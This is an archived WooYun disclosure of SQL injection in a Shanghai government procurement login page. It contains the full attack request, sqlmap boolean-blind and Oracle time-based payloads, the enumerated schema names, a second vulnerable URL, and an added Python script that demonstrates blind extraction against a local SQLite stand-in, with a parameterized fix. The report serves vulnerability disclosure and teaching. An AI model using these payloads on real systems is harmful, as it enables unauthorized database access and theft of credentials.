WooYun (WooYun.org) historical vulnerability archive --- http://wy.zone.ci/
WooYun Drops articles, online reader --------------- http://drop.zone.ci/
2015-01-26: Details reported to the vendor, awaiting vendor action
2015-01-29: Vendor confirmed; details visible to the vendor only
2015-02-08: Details disclosed to core white hats and relevant domain experts
2015-02-18: Details disclosed to regular white hats
2015-02-28: Details disclosed to intern white hats
2015-03-12: Details disclosed to the public

SQL injection vulnerability in the Shanghai Government Procurement Center (www.shzfcg.gov.cn)
1# SQL injection point
http://www.shzfcg.gov.cn:8090/net/center/stocklogin.jsp
POST /net/center/stocklogin.jsp HTTP/1.1
Host: www.shzfcg.gov.cn:8090
Proxy-Connection: keep-alive
Content-Length: 96
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://www.shzfcg.gov.cn:8090
User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
Content-Type: application/x-www-form-urlencoded
Referer: http://www.shzfcg.gov.cn:8090/net/center/stocklogin.jsp
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Cookie: JSESSIONID=52QKJDLQlqvdZ2kwJhJPLhVdhc7YSGhr5lT91KncHQhpk2cyZqRf!648548179

operator_name=1%27or%271%27%3D%271&operator_pwd=1%27or%271%27%3D%271&opstatus=login&screenwidth=
2# Database information
sqlmap identified the following injection points with a total of 265 HTTP(s) requests:
---
Parameter: operator_pwd (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: operator_name=1'or'1'='1&operator_pwd=1'or'1'='1' AND 3559=3559 AND 'hDvf'='hDvf&opstatus=login&screenwidth=

    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: operator_name=1'or'1'='1&operator_pwd=1'or'1'='1' AND 4645=DBMS_PIPE.RECEIVE_MESSAGE(CHR(120)||CHR(99)||CHR(122)||CHR(108),5) AND 'dQJJ'='dQJJ&opstatus=login&screenwidth=
---
web application technology: Servlet 2.5, JSP 2.1
back-end DBMS: Oracle
available databases [19]:
[*] CTXSYS
[*] DBSNMP
[*] DMSYS
[*] EXFSYS
[*] ITCDQ2
[*] JK
[*] MDSYS
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] SCOTT
[*] SHTEST
[*] SHZFCG
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WMSYS
[*] XDB
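As an added illustration, not part of the original report, the Python script below reproduces the logic of this finding against an in-memory SQLite database standing in for the Oracle backend. The table name `operator`, its columns and the two operator rows are constructed assumptions; the query shape (string concatenation of `operator_name` and `operator_pwd` inside quotes) is inferred from the payload that worked, not taken from the site's source. It decodes the captured body, shows the `1'or'1'='1` tautology matching every row, drives the same boolean-based blind technique sqlmap reported (sqlmap's Oracle payloads use ASCII/SUBSTR; SQLite spells them `unicode`/`substr`) to recover a value one character at a time, and finally shows the same query with bind variables rejecting the input. The Oracle time-based payload (`DBMS_PIPE.RECEIVE_MESSAGE`) has no SQLite equivalent and is not reproduced.

```python
import sqlite3
from urllib.parse import parse_qs

# Constructed stand-in data; table and column names are assumptions, the real
# SHZFCG schema is not known from the report.
SAMPLE_OPERATORS = [("admin", "S3cret!"), ("clerk", "hunter2")]

# Request body exactly as captured in the report (URL-encoded).
CAPTURED_BODY = ("operator_name=1%27or%271%27%3D%271"
                 "&operator_pwd=1%27or%271%27%3D%271&opstatus=login&screenwidth=")


def make_db():
    """In-memory SQLite database standing in for the Oracle backend."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE operator (operator_name TEXT, operator_pwd TEXT)")
    conn.executemany("INSERT INTO operator VALUES (?, ?)", SAMPLE_OPERATORS)
    return conn


def decode_form(body):
    """URL-decode the form body; keep_blank_values so screenwidth= stays visible."""
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


def login_vulnerable(conn, name, pwd):
    """Query built by string concatenation: the shape the captured payload implies.
    With name=pwd=1'or'1'='1 the WHERE clause ends in OR '1'='1' and matches every row."""
    sql = ("SELECT operator_name FROM operator WHERE operator_name='" + name
           + "' AND operator_pwd='" + pwd + "'")
    return [row[0] for row in conn.execute(sql)]


def login_parameterized(conn, name, pwd):
    """Same query with bind variables: the quotes in the input are data, not SQL."""
    sql = "SELECT operator_name FROM operator WHERE operator_name=? AND operator_pwd=?"
    return [row[0] for row in conn.execute(sql, (name, pwd))]


def blind_probe(conn, condition):
    """One boolean-based blind request in the shape sqlmap reported: the tautology,
    AND <condition>, then a closing comparison that re-balances the quote the
    application appends. The login 'succeeds' exactly when condition is true."""
    payload = "1'or'1'='1' AND " + condition + " AND 'hDvf'='hDvf"
    return len(login_vulnerable(conn, "1'or'1'='1", payload)) > 0


def extract_first_operator_name(conn, max_len=32):
    """Recover a value one character at a time through the boolean oracle, using a
    binary search over the code point (sqlmap's Oracle payloads use ASCII/SUBSTR;
    SQLite spells them unicode/substr). Returns (value, number_of_requests)."""
    subquery = "(SELECT operator_name FROM operator ORDER BY operator_name LIMIT 1)"
    value, requests = "", 0
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            requests += 1
            if blind_probe(conn, f"unicode(substr({subquery},{pos},1))>{mid}"):
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:  # past the end of the string: unicode('') is NULL, every probe fails
            break
        value += chr(lo)
    return value, requests


if __name__ == "__main__":
    db = make_db()
    form = decode_form(CAPTURED_BODY)
    print("decoded operator_name:", form["operator_name"])
    print("vulnerable login returns:",
          login_vulnerable(db, form["operator_name"], form["operator_pwd"]))
    print("parameterized login returns:",
          login_parameterized(db, form["operator_name"], form["operator_pwd"]))
    print("blind probe 3559=3559:", blind_probe(db, "3559=3559"))
    print("blind probe 3559=3560:", blind_probe(db, "3559=3560"))
    print("extracted via boolean blind:", extract_first_operator_name(db))
```

The probe with `3559=3559` versus `3559=3560` is exactly the differential sqlmap used to confirm the `operator_pwd` parameter; the character-by-character extraction shows why a confirmed boolean oracle is enough to walk the whole schema, which is where the 265 requests and the 19-schema listing come from. A seven-probe binary search per character is the same idea sqlmap applies, just without its optimisations.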
19 databases (sqlmap lists Oracle schemas as databases); the database account and password information can naturally be dumped the same way.

3# Injection screenshot

PS: another injection point
http://www.shzfcg.gov.cn:8090/login/login_quxian.jsp
Fix recommendation: filter the input; in practice, use bind variables (PreparedStatement) instead of string concatenation.
Severity: Medium
Vulnerability Rank: 10
Confirmed: 2015-01-29 14:24
CNVD confirmed and reproduced the described vulnerability and has forwarded it via CNCERT to the Shanghai branch center, which will coordinate handling with the website's operating organization.
None yet